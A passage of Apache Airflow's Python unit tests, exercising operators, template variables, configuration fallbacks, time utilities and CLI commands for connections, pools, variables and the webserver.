os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
        # Check that both the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
        # use assert_array_almost_equal from numpy.testing since we are
        # comparing floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
        # The failed task timed out after ~3 seconds, so its recorded
        # duration should be at least that long.
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
        conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', 'conn_type', 'conn_host', 'conn_login', 'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
        # Prepare to verify the connections that were added
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
        # Check the added connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existent connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
            except Exception:
                # the pidfile may not exist yet or may be partially written; retry
                sleep(1)
def test_cli_webserver_foreground(self):
import subprocess
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
import subprocess
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
